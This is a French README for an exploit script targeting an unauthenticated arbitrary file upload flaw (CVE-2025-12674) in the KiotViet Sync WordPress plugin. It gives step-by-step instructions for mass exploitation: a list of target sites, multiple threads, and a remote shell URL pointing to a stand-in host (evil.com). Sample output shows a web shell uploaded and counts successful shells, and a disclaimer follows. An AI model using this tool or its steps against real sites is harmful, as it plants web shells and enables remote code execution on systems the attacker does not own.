
KiotViet Sync <= 1.8.5 - Téléchargement arbitraire de fichiers sans authentification
KiotViet Sync <= 1.8.5 - Téléchargement arbitraire de fichier non authentifié
Le plugin KiotViet Sync pour WordPress (versions jusqu'à et y compris 1.8.5) est vulnérable aux téléchargements arbitraires de fichiers, en raison d'une validation manquante du type de fichier dans la fonction create_media().
Cette vulnérabilité permet à des attaquants non authentifiés de télécharger des fichiers arbitraires sur le serveur, ce qui peut conduire à une exécution de code à distance.
Clonez ce dépôt, ou téléchargez le script.
Préparez vos cibles :
Placez une cible par ligne dans un fichier nommé .
list.txtexample.com
site2.com
http://site3.com
Exécutez le script d'exploitation :
Le nom du script est :
CVE-2025-12674.py
python3 CVE-2025-12674.py
Lorsque vous y êtes invité, saisissez vos options :
Enter targets file name (default: list.txt): list.txt
Enter number of threads (default: 10):
Enter REMOTE SHELL URL (direct link): http://evil.com/shell.php
╭──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╮
│ Loaded 1 targets. Threads: 10. │
╰──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╯
╭──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╮
│ http://nxk.ddev.site │
│ Trying KiotViet exploit... │
╰──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╯
╔══════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════╗
║ ✔ Shell uploaded! ║
║ Check here: ║
║ http://nxk.ddev.site/wp-content/uploads/2026/01/ ║
║ ║
╚══════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════╝
Summary
Metric Value
───────────────────────────
Total attempts 1
Successful shells 1
Failed attempts 0
shells.txt.Ce script est fourni uniquement à des fins éducatives et de tests de sécurité autorisés.
L'utilisation non autorisée contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas d'autorisation explicite est illégale et contraire à l'éthique.
L'auteur décline toute responsabilité en cas d'utilisation abusive ou de tout dommage causé.
Nxploited (Khaled Alenazi)